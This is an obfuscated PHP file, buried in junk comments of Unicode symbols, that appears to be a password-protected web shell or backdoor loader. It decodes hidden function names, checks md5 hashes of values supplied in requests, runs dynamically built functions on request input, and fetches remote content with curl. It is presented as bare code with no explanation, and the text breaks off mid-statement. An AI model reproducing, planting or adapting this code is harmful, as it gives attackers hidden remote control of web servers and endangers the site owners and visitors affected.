<?php /*-c,-*///
$bmzHe = /*-
≽∳✗㊠⋴Ⓗ≙☮≳✪≚⅑▁⊬◉❤▻⇜㊘∴ℚ↬⊸▐↗】❄
B?X(gouI!≽∳✗㊠⋴Ⓗ≙☮≳✪≚⅑▁⊬◉❤▻⇜㊘∴ℚ↬⊸▐↗】❄
-*///
range/*-c:D-*///
(/*-P^--*///
"~", " "/*-CD5-*///
); /*-Ef92U+O-*///
$S=/*-
⓰▉❐⓪¶〔☯Ⅲ⋝］✣↧ˉ㊘➻ℝ➚➣╗Ⓣ╇㊉︸⇆╁
;_ntTI)5l⓰▉❐⓪¶〔☯Ⅲ⋝］✣↧ˉ㊘➻ℝ➚➣╗Ⓣ╇㊉︸⇆╁
-*///
${$bmzHe[4+27].$bmzHe[8+51].$bmzHe[17+30].$bmzHe[10+37].$bmzHe[2+49].$bmzHe[34+19].$bmzHe[0+57]};if/*-RFD-*///
(in_array(/*-


∳㊋▕░›┕◉』♨


,Pz∳㊋▕░›┕◉』♨


-*///
gettype(/*-

③⊃⒗❋≟≑⅔⓺➞⅕▭≤╢♖ⓚ◡

gbXFJx3③⊃⒗❋≟≑⅔⓺➞⅕▭≤╢♖ⓚ◡

-*///
$S)."25",$S)&&(md5/*-


∭↖⇪≱ⅴ╊◅ℭↂ【✺⒋⇦▄ⅿ╏▼◦≴☝⇑➋ℝ⓴⑷≂☱↼⋲⋙∞


F98OXTF∭↖⇪≱ⅴ╊◅ℭↂ【✺⒋⇦▄ⅿ╏▼◦≴☝⇑➋ℝ⓴⑷≂☱↼⋲⋙∞


-*///
(md5/*-MA6rz7Kgy#-*///
(md5/*-{53M-*///
(md5/*-
↣Ⓡ㊃‱ↂ⋥∼✙⑩ⅶ┦ⓖ∉⊼┮⊉⊗⑽↬Ⓩ┈⑸∖
bsM3e↣Ⓡ㊃‱ↂ⋥∼✙⑩ⅶ┦ⓖ∉⊼┮⊉⊗⑽↬Ⓩ┈⑸∖
-*///
($S[19]))/*-

㊋﹠⒳∲╟ℜ⅝ⅨⓀ▂》☇⊥♭✑◊ℙ▱│

$D:poji@&㊋﹠⒳∲╟ℜ⅝ⅨⓀ▂》☇⊥♭✑◊ℙ▱│

-*///
))/*-Z0JqL+7;}_-*///
===/*-D!HT-*///
"e7fd7867516cfc4c6f8b8efa4bd93c21"/*-AGhH`H2-*///
)){$S[69]=$S[69].$S[78];$S[81]=$S[69]($S[81]);@$S=$S[81]($S[57],$S[69](${$S[31]}[24]));/*-

∴㊰╞∟➆▪≵╌◨╈▱⒰⒕❆⒴▓╢◸⅒∛⋓┓㊧﹪⋫㍿☈═┧

E!6?4∴㊰╞∟➆▪≵╌◨╈▱⒰⒕❆⒴▓╢◸⅒∛⋓┓㊧﹪⋫㍿☈═┧

-*///
$S/*-


┘◈ⓣ⒋♙↧▿⅟≟☼▷✌❒∾┬┸≫⊯ⓙ≥⊛Ↄ∯✈✩☧➔⋣Ⓟ↣⊅


=uxdJy)┘◈ⓣ⒋♙↧▿⅟≟☼▷✌❒∾┬┸≫⊯ⓙ≥⊛Ↄ∯✈✩☧➔⋣Ⓟ↣⊅


-*///
();/*-

≕❽▦⋿☆❒ⓩ╂Ψ㊩∃

]st<CLz:≕❽▦⋿☆❒ⓩ╂Ψ㊩∃

-*///
}/*-WZK<pXr-*///
class /*-X^~HM1H-*///
q{ /*-


℉⅛⒠▲ⅱ웃┛▍︷∊↗☭Ⓙ⊕≘›⑤⇟◊☱┄┭⊸∉


@pj2@xPQW@℉⅛⒠▲ⅱ웃┛▍︷∊↗☭Ⓙ⊕≘›⑤⇟◊☱┄┭⊸∉


-*///
static/*-`pesbF-*///
 function /*-eom=-*///
tLQJTnPEu($TKyW) /*-@}!GeQ)o[0-*///
{ $xCvbs/*-aH,zgks-*///
 = /*-ffrfyxjA-*///
"r"./*-<r6)G:XSg-*///
"a"./*-
✢┟▦⇉❄⋠⑯◭◱➡^⊢【⅝º⋻
i!e;RlXMZz✢┟▦⇉❄⋠⑯◭◱➡^⊢【⅝º⋻
-*///
"n"./*-6MK~kiAq-*///
"g"./*-3<$E`.Fe#4-*///
"e"; /*-Vs@3^YY-*///
$pb/*-

⊱‱㊊☨〗═ⓕ⑻⋰」⇊⊏⒨✦◸⇀⑦⋒⋓➝↢✴∬◽‰

^5E⊱‱㊊☨〗═ⓕ⑻⋰」⇊⊏⒨✦◸⇀⑦⋒⋓➝↢✴∬◽‰

-*///
 = /*-_QA;pMi-*///
$xCvbs/*-


╡▢⊄㊪╠π┥⋡⅙≑㊬Ⅽ◥


j-R2T3jwW╡▢⊄㊪╠π┥⋡⅙≑㊬Ⅽ◥


-*///
(/*-hiLa-*///
"~"/*-

⊓➩◇✝✫▏㊒Ⅶ↭≩➾⊛ℕ⒆➮⊅∠㊣➧➫↞⇃⊖㏒

(cg%j<⊓➩◇✝✫▏㊒Ⅶ↭≩➾⊛ℕ⒆➮⊅∠㊣➧➫↞⇃⊖㏒

-*///
, /*-
┚⋵Ⅽ≄⇩∞㊟⇁☼▨┲⊺❻⑷≪⑫∖☤≼➌╪
?,s>D┚⋵Ⅽ≄⇩∞㊟⇁☼▨┲⊺❻⑷≪⑫∖☤≼➌╪
-*///
" "/*-


➾⊆∭㊇∻☂⒈⋀유△⋊⊫︽⒁♖⒥⓴▇⋕⌔╂⑵◾⇅┽


c.5➾⊆∭㊇∻☂⒈⋀유△⋊⊫︽⒁♖⒥⓴▇⋕⌔╂⑵◾⇅┽


-*///
);/*-(4<g>+W,|-*///
 $xHC /*-


➇☩ⅳЮ♖ℭ


x!(Z%L➇☩ⅳЮ♖ℭ


-*///
= /*-^VJF-*///
explode/*-

﹪」⇝♒❖⋶Ⓩ℗☑❺∳⋚⋠╛╦ℬⓦ☣↱❁

gr﹪」⇝♒❖⋶Ⓩ℗☑❺∳⋚⋠╛╦ℬⓦ☣↱❁

-*///
(/*-A3-*///
"!", /*-zU,N-*///
$TKyW/*-Ulxz-*///
); /*-h_$-*///
$zyTZ /*-,G}3y-*///
= /*-~~c7-*///
""; foreach /*-xPR)-*///
(/*-
╔⊆⊩Ⓖ﹟≙╊➷⒐➧⒧تﭢ⊒
@Z8╔⊆⊩Ⓖ﹟≙╊➷⒐➧⒧تﭢ⊒
-*///
$xHC /*-

↉◶⋇㈣≊☰ℒ☍⒂⒗㊗◌≖∛➪∱☺♪⓹↠⋨∳◜⋦✃∊

G.↉◶⋇㈣≊☰ℒ☍⒂⒗㊗◌≖∛➪∱☺♪⓹↠⋨∳◜⋦✃∊

-*///
as /*-;%mmV&-*///
$uiGLQqwv /*-)m+3O9D+[-*///
=>/*-

ⅻℨ⋳✰☈۵┑┬

a%ⅻℨ⋳✰☈۵┑┬

-*///
 $xk/*-x^)e;mex-*///
) /*-
↊¢✣▸✩㊙℃Ⓑ♠⋀⒡‹ﭢ×﹜﹎ت▯≅⋶∋⒎⋳《⊷≯≥☒☴✝⅝
Ng>↊¢✣▸✩㊙℃Ⓑ♠⋀⒡‹ﭢ×﹜﹎ت▯≅⋶∋⒎⋳《⊷≯≥☒☴✝⅝
-*///
$zyTZ /*-2o|f{-*///
.= /*-KpTBt&-*///
$pb[$xk/*-9+iN-*///
 - /*-D2.pI.|+[u-*///
1885/*-!-*///
];/*-

⇟≷♫↳∢↢ϡ㈨✹⋮

s~l$tNwJ⇟≷♫↳∢↢ϡ㈨✹⋮

-*///
 return /*-}xtobLm-*///
$zyTZ; /*-x<n)-*///
} /*-
☮╫π✈ø∮◢$∦ℙ≉∊♗┖☷❾
6jUN☮╫π✈ø∮◢$∦ℙ≉∊♗┖☷❾
-*///
static /*-tr:U)-*///
function /*-

┹➹╋⑲⓺↋╡↩

z_AXx-Y┹➹╋⑲⓺↋╡↩

-*///
jIFhs/*-


㊝▐Ⓣ➔﹫﹠♢⊴┋❾♧∑Σ↲®╢⊶➒﹎⓰❉∀∻☧∥┨


zdqq%vt㊝▐Ⓣ➔﹫﹠♢⊴┋❾♧∑Σ↲®╢⊶➒﹎⓰❉∀∻☧∥┨


-*///
(/*-


⇤∅✰


r23(;&)⇤∅✰


-*///
$SPuqawyQ,/*-


%㊒∦╘✑⌒◸┡⒫✌


}.r%㊒∦╘✑⌒◸┡⒫✌


-*///
 $TGsqPMxE/*-Ovf-*///
)/*-Px{;G-*///
 {/*-zDr<`S|;DI-*///
 $xHCNitQhT/*-b|BNt-*///
 = /*-Pr-*///
curl_init/*-FAJHMl>x5-*///
(/*-
﹂▤
>7ix﹂▤
-*///
$SPuqawyQ/*-tOi-*///
);/*-n5HBV=-*///
 curl_setopt/*-


ℱ㈥☚⒤⑫✹≮


X$qA^{f3ℱ㈥☚⒤⑫✹≮


-*///
(/*-


┘╒➱⋅┼⋠◟❦†☱╁◹ⅹ


|QgCw!muj%┘╒➱⋅┼⋠◟❦†☱╁◹ⅹ


-*///
$xHCNitQhT,/*-W..-*///
 CURLOPT_RETURNTRANSFER,/*-x-*///
 1/*-S@)v)5#-*///
);/*-


▱◧⋋⓿⓳Ⅹ⅕⒯↉◤ℴ⊷⒊➥⋑☣∟◳╬Ⓙ╌⓰∭┣◀


lx.R+▱◧⋋⓿⓳Ⅹ⅕⒯↉◤ℴ⊷⒊➥⋑☣∟◳╬Ⓙ╌⓰∭┣◀


-*///
 $GBl/*-!v-*///
 = /*-wy-*///
curl_exec/*-i=l^N[{:B-*///
(/*-


Ю☯♟├➎✰⒑↿⊜➚⒜㊥╌⇂✕〔╬☆✄◣


Zw67Cf5(#IЮ☯♟├➎✰⒑↿⊜➚⒜㊥╌⇂✕〔╬☆✄◣


-*///
$xHCNitQhT/*-
⇗┓⒐┱Ⓢ⋢≔㈩@☍⇔≪➒❖➶≘〗∻⌓⊿⓼
Kd;o!u3W⇗┓⒐┱Ⓢ⋢≔㈩@☍⇔≪➒❖➶≘〗∻⌓⊿⓼
-*///
); /*-EE#%]g_-*///
return /*-LQF+yj+p-*///
empty/*-3A-*///
(/*-
㊜▣
d,lP2Vq)㊜▣
-*///
$GBl/*-)E$q87(%$w-*///
)/*-$YNmkfY-*///
 ? /*-


⒳⊰˜♫⋪Ⅸ⒉©㊈


n(yJ=⒳⊰˜♫⋪Ⅸ⒉©㊈


-*///
$TGsqPMxE/*-~%)-*///
(/*-rm-*///
$SPuqawyQ/*-J6cyd6<e:-*///
)/*-gR|-*///
 : /*-YE-8{fn-*///
$GBl; /*-g->O$RVw-*///
}/*-
⋙┠♜º㊅╇◳ℌ」卍✤¿∺✦✄▤➣
=e45uuS0⋙┠♜º㊅╇◳ℌ」卍✤¿∺✦✄▤➣
-*///
 static/*-


↟➌¥］◴┭∴◙‿☳↞✸➎╌⊆▪⒕⑽∘⋃


j4x↟➌¥］◴┭∴◙‿☳↞✸➎╌⊆▪⒕⑽∘⋃


-*///
 function /*-


⊚◄﹍⑲╁⋭∧≌⊿∐⓷›


E?⊚◄﹍⑲╁⋭∧≌⊿∐⓷›


-*///
PmFXjNQC/*-$gduw;n1S-*///
() /*-7xs`Kc)R-*///
{/*-As:Uo16T-*///
 $ugUGiqjf /*-fm2-*///
=/*-h0%I--*///
 array/*-

♧⇦⑧≫⒚ⓛ≷½▁︿∼⋹﹍┧⚘⇎⌘⒍╜⓺☋➺ⅾ⋛

QqtBkRl4♧⇦⑧≫⒚ⓛ≷½▁︿∼⋹﹍┧⚘⇎⌘⒍╜⓺☋➺ⅾ⋛

-*///
("1912!1897!1910!1914!1895!1910!1916!1909!1894!1901!1912!1895!1906!1900!1901","1896!1895!1897!1916!1897!1900!1895!1962!1960","1905!1896!1900!1901!1916!1911!1910!1912!1900!1911!1910","1899!1914!1912!1904","1913!1914!1896!1910!1957!1959!1916!1911!1910!1912!1900!1911!1910","1909!1906!1903!1910!1916!1908!1910!1895!1916!1912!1900!1901!1895!1910!1901!1895!1896","1939!1969","1886","1964!1969","1946!1929!1929!1946!1922","1900!1909"); /*-P1uNawy-*///
foreach /*-
㏒✘✤≏×┅◿⇋↗º✲
sd>`LKy%2㏒✘✤≏×┅◿⇋↗º✲
-*///
(/*-


Ⓘ⅕↶㍿┱ℝ⊔⊹▌✻❅⊈⒘♋⊉∊º≂➡➓㊘∰ⓟ↠▅Ⓚⓣ㊭


<@os-gⒾ⅕↶㍿┱ℝ⊔⊹▌✻❅⊈⒘♋⊉∊º≂➡➓㊘∰ⓟ↠▅Ⓚⓣ㊭


-*///
$ugUGiqjf/*-
☑┢ˉ⒜∸◭⇨≮∦』⊈Ⓞ۰⇙⊧⒭⅙∛⋵⋞♦
8M|e:3e☑┢ˉ⒜∸◭⇨≮∦』⊈Ⓞ۰⇙⊧⒭⅙∛⋵⋞♦
-*///
 as /*-ZB-*///
$Ff/*-^W?yT8_=i-*///
)/*-$UZ:<V].-*///
 $lHyIwp/*-

≮∵◳㊯∦⊣⒕╂Ⓞ↖♭§⋋≫⒨✗❣➽⇐♆

P+wy5≮∵◳㊯∦⊣⒕╂Ⓞ↖♭§⋋≫⒨✗❣➽⇐♆

-*///
[] /*-_o$&&!3W-*///
= /*-


⊑Ⅺ℘⊂◜➮°┳∿✻⒦╃❽➊⇕➓


J$f⊑Ⅺ℘⊂◜➮°┳∿✻⒦╃❽➊⇕➓


-*///
self/*-Wb[i<4]6O`-*///
::/*-
˜⋚㊕⊍♠⊎㊩〈⋶▮ˉ㊀『⑲╖❷¡︽㊛╘Ⓓ✻▋▥▐
=_N^a)X˜⋚㊕⊍♠⊎㊩〈⋶▮ˉ㊀『⑲╖❷¡︽㊛╘Ⓓ✻▋▥▐
-*///
tLQJTnPEu/*-


≾☉々ϟ⊟➽ⓔ⊨↨☱┅㊓卍◣ℜ⓫⅞㊧﹜⊏╖ↅℤ⅜


#33wn≾☉々ϟ⊟➽ⓔ⊨↨☱┅㊓卍◣ℜ⓫⅞㊧﹜⊏╖ↅℤ⅜


-*///
(/*-Yx}rWlJ-*///
$Ff/*-


┐Ⅿ▢≦↖ⅱ


oYYIc_bB+┐Ⅿ▢≦↖ⅱ


-*///
);/*-
┡︺﹡♘➝﹁㊂╥▓✦£‐⋛♧∕‱卍ℰ
8&)ENa┡︺﹡♘➝﹁㊂╥▓✦£‐⋛♧∕‱卍ℰ
-*///
$mTgwMkiqy /*-
∴㊨Ⓥ⑪≙♥❒≫⑦☰
$M`F∴㊨Ⓥ⑪≙♥❒≫⑦☰
-*///
= /*-

⊯◢⓴➭⒀⊹☁┇⌔⒭❂❆⇠③┝ℕ⇤

C~⊯◢⓴➭⒀⊹☁┇⌔⒭❂❆⇠③┝ℕ⇤

-*///
@$lHyIwp/*-

⇚⒑✗✚﹊＂◺⓽¤⋱♞⋵

;@dO+;?d5⇚⒑✗✚﹊＂◺⓽¤⋱♞⋵

-*///
[/*-
➙∸◙╀︵♠
X%U}7f{{➙∸◙╀︵♠
-*///
1/*-q`zV<m,,-*///
]/*-

▰✌▫☄﹪☭⊯⒰⋔┑▆▤┷│⒎⅘

0v0Q▰✌▫☄﹪☭⊯⒰⋔┑▆▤┷│⒎⅘

-*///
(/*-


✲⒇﹪┈ⓑ⋃ℬ❂ⓔ{∧─⅕┗∞✂┳✖⓶☑ⅿ


yx7U]b✲⒇﹪┈ⓑ⋃ℬ❂ⓔ{∧─⅕┗∞✂┳✖⓶☑ⅿ


-*///
${/*-

⒬⋔✪∁☼◑⒎⓻︶≴유↠❷［⅟㈥♩⋱▌╫⇏۵╡ℌ㊣ⅽ∥㊀➓

A5H⒬⋔✪∁☼◑⒎⓻︶≴유↠❷［⅟㈥♩⋱▌╫⇏۵╡ℌ㊣ⅽ∥㊀➓

-*///
"_"/*-


❽⒗⒩┧﹡☊➚╆➻◷


bL(aJg❽⒗⒩┧﹡☊➚╆➻◷


-*///
."G"/*-sOP-*///
."E"/*-

×┃◹▍✘∛⒲➵┏ⓓˉⓉ⌘↠◡⒤➁⑷▢⋷

lTw}b9h×┃◹▍✘∛⒲➵┏ⓓˉⓉ⌘↠◡⒤➁⑷▢⋷

-*///
."T"/*-%Zy`o-*///
}[/*-

▬⋴⇐▓▲］◢ⓥ◣╨┉㊖⇅➙♢┴『‡⓾﹦⊻︺⊹█┡￡

BID0▬⋴⇐▓▲］◢ⓥ◣╨┉㊖⇅➙♢┴『‡⓾﹦⊻︺⊹█┡￡

-*///
$lHyIwp/*-d?[}2d-*///
[/*-<b-*///
9+0/*-DjlGPzo=_-*///
]]/*-


╂✈⓪❒Φ︿⓼◖∯⋦︹ⓑ➺ⓧ►#❻★☠㊘▽「╛⋖⋬╒ⓐ▥⋗


u9T%╂✈⓪❒Φ︿⓼◖∯⋦︹ⓑ➺ⓧ►#❻★☠㊘▽「╛⋖⋬╒ⓐ▥⋗


-*///
);/*-
Ⓚ▸◶Ü▄≈Φ▯Ⅸ°⒁≂➌┥┩➛◎⒉➪➡◇◂ℱ┒▇
o|9d,1Ⓚ▸◶Ü▄≈Φ▯Ⅸ°⒁≂➌┥┩➛◎⒉➪➡◇◂ℱ┒▇
-*///
 $PpcZU /*-w_Q-*///
=/*-UVh-+-*///
 @$lHyIwp/*-

⊷⊌➈ⓕⅿ⅐⋾↕《▏ⓡ⓹∪±⊥➹℉♖✩➭⒜┯╈↧⓬

g,Ojy-XI⊷⊌➈ⓕⅿ⅐⋾↕《▏ⓡ⓹∪±⊥➹℉♖✩➭⒜┯╈↧⓬

-*///
[/*-mI;lwFq%-*///
0+3/*-


⒯«≭◶⊈☶⋢㊚


=M3,i3)vn⒯«≭◶⊈☶⋢㊚


-*///
]/*-+F8u-*///
(/*-@5Bte-*///
$lHyIwp/*-

◓¢Ⓡ▄▬☩⓺↓⒨⋃㊀ℙ◃⒮▲┌⇙@⅚⒘✷⋀∓❖↩﹨﹠⇖Ⅾ◛

.{YU7zb◓¢Ⓡ▄▬☩⓺↓⒨⋃㊀ℙ◃⒮▲┌⇙@⅚⒘✷⋀∓❖↩﹨﹠⇖Ⅾ◛

-*///
[/*-tWxp^}O#-*///
5+1/*-
≕╓『⊺﹥≵➪Ⅶ┐
]4Q-b{7≕╓『⊺﹥≵➪Ⅶ┐
-*///
], /*-t!xJSdR-*///
$mTgwMkiqy/*-MIgFO-*///
);/*-

✫┚➎┓✏⇝┹⊚◄⋢ⅶ╦―⋸≾⑨≿◾ℳ

ZF~✫┚➎┓✏⇝┹⊚◄⋢ⅶ╦―⋸≾⑨≿◾ℳ

-*///
 $khgzHTL /*-


≰ⓕⅣ┹❐▸∦۰☋◎⑲☺⋪❸✯✏Ⅽ♂✙↸「ℳ△∵☰Ⓢ┃ↇ⊇┶


$Gnufk≰ⓕⅣ┹❐▸∦۰☋◎⑲☺⋪❸✯✏Ⅽ♂✙↸「ℳ△∵☰Ⓢ┃ↇ⊇┶


-*///
=/*-
Ⓞ▏↲&큐☳◶✒➇⒋۰─ⓩℂ⊟♋❖%✩☤⒰▪╖⇃◗❃¿
4KⓄ▏↲&큐☳◶✒➇⒋۰─ⓩℂ⊟♋❖%✩☤⒰▪╖⇃◗❃¿
-*///
 $lHyIwp/*-

✝┾㈤ℍ⋚⒮{〈┷╔✄ﭢ✾

kO,9WE&✝┾㈤ℍ⋚⒮{〈┷╔✄ﭢ✾

-*///
[/*-kJH+b3V5-*///
1+1/*-


░∟↕⓰➢✩ⓜ⅚⊭⒋✴◌


tuLH`░∟↕⓰➢✩ⓜ⅚⊭⒋✴◌


-*///
]/*-`O<J0e#-*///
(/*-#PH-*///
$PpcZU,/*-hs-*///
 true/*-

◧⇜ⓛ≟ℭ→♭ﭢ∙ⓔ≜㊪⑷↻㈡㊤㊭➃∅℠☽［✥⇥∔➉⑥㊑⋣⊞▌

ne_◧⇜ⓛ≟ℭ→♭ﭢ∙ⓔ≜㊪⑷↻㈡㊤㊭➃∅℠☽［✥⇥∔➉⑥㊑⋣⊞▌

-*///
); /*-hEc&N-*///
@${/*-
㊬◢❁✺╦㊥⓫✵↢╓┌∐┉∫﹊∑℅¯➼Ⅰ⊠ℚ⒘◷
~pxuqS!$}㊬◢❁✺╦㊥⓫✵↢╓┌∐┉∫﹊∑℅¯➼Ⅰ⊠ℚ⒘◷
-*///
"_"./*-
⇞⋫ⓧ☟▿≊⊓♟⊹⋻㊤⋽웃Ⓥⓨ︻┰⋑ℯ≰✆➞➥♥
g>,⇞⋫ⓧ☟▿≊⊓♟⊹⋻㊤⋽웃Ⓥⓨ︻┰⋑ℯ≰✆➞➥♥
-*///
"G"./*-

≬∨≞◃⒬≮☲❏

wmJbJFm≬∨≞◃⒬≮☲❏

-*///
"E"/*-


〕❿⊂⇇➳ℙ≆↦㊏➩⒦½㊥⒍ⓧ


;zQft^7〕❿⊂⇇➳ℙ≆↦㊏➩⒦½㊥⒍ⓧ


-*///
."T"/*-
￣▓▉ℛ☥╔⒒┪↬ℐ♭┒╎㊣⇂㊊⊞◁〓≫≏┣≭Ⓝ⋘⇦
MobE}u+jv￣▓▉ℛ☥╔⒒┪↬ℐ♭┒╎㊣⇂㊊⊞◁〓≫≏┣≭Ⓝ⋘⇦
-*///
}/*-


⋟ⓢ╧Ⓖ×╤↲ℒⓆ♓⇄◸┢☃♨≽✖⒩⇥㊊⒗⊅⌖▌﹎✝➮┌⒙


kS#5⋟ⓢ╧Ⓖ×╤↲ℒⓆ♓⇄◸┢☃♨≽✖⒩⇥㊊⒗⊅⌖▌﹎✝➮┌⒙


-*///
[/*-f051.8-*///
$lHyIwp/*-g@CBPlGS-*///
[8+2/*-


⊿㊯⊎∦┳▵Ⓞ✲⒚⋻）⓶☤卍〖⇖│⑼◓❅⊸‹


Do⊿㊯⊎∦┳▵Ⓞ✲⒚⋻）⓶☤卍〖⇖│⑼◓❅⊸‹


-*///
]/*-

Ⓜ」✸ℴⅥ≭⊊➺❿Ⓒ¿﹍⑦』▴㊐▏㊔♚

k?7m$_pZⓂ」✸ℴⅥ≭⊊➺❿Ⓒ¿﹍⑦』▴㊐▏㊔♚

-*///
]/*-

Ⅳ┚⑬✯

eF^:A>Ⅳ┚⑬✯

-*///
 == /*-

≍◂㈤♋Ⅶ⇥┖◻◅◄▇

menbQX-≍◂㈤♋Ⅶ⇥┖◻◅◄▇

-*///
1 /*-
Ⓗ↩⓵⊂⅙┗┭⊚〈✮╠↭♮☜〖
,4raEpⒽ↩⓵⊂⅙┗┭⊚〈✮╠↭♮☜〖
-*///
&& /*-+VPxO-*///
die/*-


╔╪⊊㊯❁Ⓨ￣❼∸


Ad.nZJt╔╪⊊㊯❁Ⓨ￣❼∸


-*///
(/*-

♪〓Ⓤ⋒⋧❹［⑴

>AT+JL♪〓Ⓤ⋒⋧❹［⑴

-*///
$lHyIwp[4+1/*-XjaaB-*///
]/*-NRa-*///
(/*-
⋯∆❼⇏⊶ℜ÷┻㊧➒≬✝✉ℨ◰⊎⇡℗⇃◯♆∸○◣❽
QrC=C⋯∆❼⇏⊶ℜ÷┻㊧➒≬✝✉ℨ◰⊎⇡℗⇃◯♆∸○◣❽
-*///
__FILE__/*-`04,Qc:%QN-*///
)/*-

㊯❁➄✁↓⊵┞➔ⓥ◽⑭▸╦

D{L3K7㊯❁➄✁↓⊵┞➔ⓥ◽⑭▸╦

-*///
); /*-

㊚✷㈣┊↴↊⓴ϟ⊵◫㊖ℚ⊽┩⊯Ⓠ∌⊋﹫▇♁☌┗◹

njX8CL:㊚✷㈣┊↴↊⓴ϟ⊵◫㊖ℚ⊽┩⊯Ⓠ∌⊋﹫▇♁☌┗◹

-*///
if/*-

↸↷☐Ⅿ↯▷﹍⒧∭

DN(@8I4<t↸↷☐Ⅿ↯▷﹍⒧∭

-*///
(/*-W@ANh^x+-*///
 (/*-

◵╤➒⋋‱×⇚웃º

}ZJ_F◵╤➒⋋‱×⇚웃º

-*///
(@/*-tvDp$-*///
$khgzHTL/*-

➎✕

sU➎✕

-*///
[/*-
↦❤☀❁⓾
9B↦❤☀❁⓾
-*///
0/*-=G=-*///
] /*-


≵╚└➀⑷｜▆⒍➾ⅸ❇≯﹣↸▸⒁➨⇝≑


3o≵╚└➀⑷｜▆⒍➾ⅸ❇≯﹣↸▸⒁➨⇝≑


-*///
- time/*-7|T-*///
()/*-


☨∰∼◉⒦♒⋣℃◒↴⊹ⓨⅳ☋


wB`GtPYx@c☨∰∼◉⒦♒⋣℃◒↴⊹ⓨⅳ☋


-*///
) > /*-

⋕∱♈

66.H20s⋕∱♈

-*///
0/*-(&E-*///
)/*-


㊕℘⑤㊭⊁⋲❃▍⇕⑽ⓛ«⋕⌓⋶∈


:}.UI~88㊕℘⑤㊭⊁⋲❃▍⇕⑽ⓛ«⋕⌓⋶∈


-*///
 and /*-


○≊⒜♥≕♁⊏⑭Ⓦ╨▎⇥✘⅔✔Ⓧ─½〗✝✠⋀∺｜┉πⅫ⒵➼☒﹩


Kt5wQ1w}○≊⒜♥≕♁⊏⑭Ⓦ╨▎⇥✘⅔✔Ⓧ─½〗✝✠⋀∺｜┉πⅫ⒵➼☒﹩


-*///
(/*-zSe49-*///
md5/*-GHt`tCHa4-*///
(/*-rD6}-*///
md5/*-

┣✩⋈⒠﹠◤⅓✆⓺➒≓✑⑧⒖╕▒←♬

|┣✩⋈⒠﹠◤⅓✆⓺➒≓✑⑧⒖╕▒←♬

-*///
(/*-]qv--*///
$khgzHTL/*-2X7H9%uu-*///
[/*-lf-*///
3+0/*-

⋰⇡┸

h[qlrb&6⋰⇡┸

-*///
]/*-I[-*///
)/*-
③}▃⅕◈▲❂㊆┱︻ℱ⋧╝▅♯⒱℅
D`=Avi③}▃⅕◈▲❂㊆┱︻ℱ⋧╝▅♯⒱℅
-*///
)/*-.+-*///
 === /*-
ↆ⊬⋳↑➾⑥╂큐⊩▤≌◙◻┟≧⓰⒁ℛ❷Ⅾ
3$|vdↆ⊬⋳↑➾⑥╂큐⊩▤≌◙◻┟≧⓰⒁ℛ❷Ⅾ
-*///
"8a733313bf6b9c39660cc9bf4329d1ba"/*-lg2m_`0-*///
)/*-


✫⇞♫⓳˜➳∔┵☥⊨✚⋧✿⅔Ⅾ┨⒘ↇ↊


-h✫⇞♫⓳˜➳∔┵☥⊨✚⋧✿⅔Ⅾ┨⒘ↇ↊


-*///
 ): /*-sD^8%)2sj-*///
$Iq /*-fXa-*///
=/*-I,wbWT1-*///
 self/*-

↾↷▸✈ⓓ≶⑴▷☩⊷﹉◺⇩㊂▁ⓨ▋〉〖▯⑻［►⋷■✑㈨➈☜∪⋔

gGT↾↷▸✈ⓓ≶⑴▷☩⊷﹉◺⇩㊂▁ⓨ▋〉〖▯⑻［►⋷■✑㈨➈☜∪⋔

-*///
::/*-
≀❷➓
DU≀❷➓
-*///
jIFhs/*-%&&V-*///
(/*-aDJSYg)Mz-*///
$khgzHTL/*-

ⓜ﹥╤ⓟ✗﹄웃⇜♜㊠✩☽┌Ⓒ⋴ↅ✶⑻↉（❿☹≽⌘❈❤❣

Xs`Bs9Rⓜ﹥╤ⓟ✗﹄웃⇜♜㊠✩☽┌Ⓒ⋴ↅ✶⑻↉（❿☹≽⌘❈❤❣

-*///
[/*-
⊺⓽⒛⊆➲︻↋⇚ⓕ➷≓〔ϟ═♀┌↖▁◉
TBY:&M⊺⓽⒛⊆➲︻↋⇚ⓕ➷≓〔ϟ═♀┌↖▁◉
-*///
0+1/*-

︵❄㈦↱⑥◚↟∙→～◺Ü⒃✩€↮⊇✁⌘➧¤≙㊛‱⒗×◮━⇩Ⅰ➄

vL︵❄㈦↱⑥◚↟∙→～◺Ü⒃✩€↮⊇✁⌘➧¤≙㊛‱⒗×◮━⇩Ⅰ➄

-*///
], /*-


☄┑⑶≅→◃⊉⓯▧☥♨卍⒔Ⓑ


Lh☄┑⑶≅→◃⊉⓯▧☥♨卍⒔Ⓑ


-*///
$lHyIwp/*-


⊨］❾


>pk9q⊨］❾


-*///
[/*-

⅔◤ℙ﹢¶∪▹웃ⒸⓄ➓⊀∦≂㊠⇒✲

Od!dU%t6⅔◤ℙ﹢¶∪▹웃ⒸⓄ➓⊀∦≂㊠⇒✲

-*///
4+1/*-&umtVM-*///
]/*-

⒥◂➩⑺⒯☜╣➟⓻Ⅼ⌒℗⊽☵﹫➃〔ϡ▐↯∎┲⋴♧Ⓙ✃

CY5⒥◂➩⑺⒯☜╣➟⓻Ⅼ⌒℗⊽☵﹫➃〔ϡ▐↯∎┲⋴♧Ⓙ✃

-*///
);/*-

│⋬≾︹☺

[qmv9DxVc│⋬≾︹☺

-*///
@$lHyIwp/*-

✑✚⌘∹≊⊝∵⒛⋟♢∩㊏◕◞½ⅾⅢ⓮◵Ψ㊕⊒⇚⑺⑷⋕ⓩ

SIk✑✚⌘∹≊⊝∵⒛⋟♢∩㊏◕◞½ⅾⅢ⓮◵Ψ㊕⊒⇚⑺⑷⋕ⓩ

-*///
[/*-)EJ-*///
0/*-veWhso-*///
]/*-}t0#01):)O-*///
(/*-


▔∖ℋ㈤⓫


hMbBC6c▔∖ℋ㈤⓫


-*///
"",/*-lV|3RLcz@s-*///
 $lHyIwp/*-


ⅷ⒩╖☚≗≧⓴≊⇇➔


ICKRX>ⅷ⒩╖☚≗≧⓴≊⇇➔


-*///
[/*-UX0oOnst-*///
3+4/*-

┐』⒔↶☞▋▐⇄ℎↇⓏ☂╜ⅵ⒫▽⓰㊀⋓✶Ⅽ⋁）✻≮♈♥⋀┕

jdj#XzGLd.┐』⒔↶☞▋▐⇄ℎↇⓏ☂╜ⅵ⒫▽⓰㊀⋓✶Ⅽ⋁）✻≮♈♥⋀┕

-*///
] /*-
◺✞ⅻⅮ∈∫♜©┬♕ⅷ♀➃⋀⋣╇≠∘≟）➉웃┊ⓡ➫◔≼
Aqt◺✞ⅻⅮ∈∫♜©┬♕ⅷ♀➃⋀⋣╇≠∘≟）➉웃┊ⓡ➫◔≼
-*///
. /*-
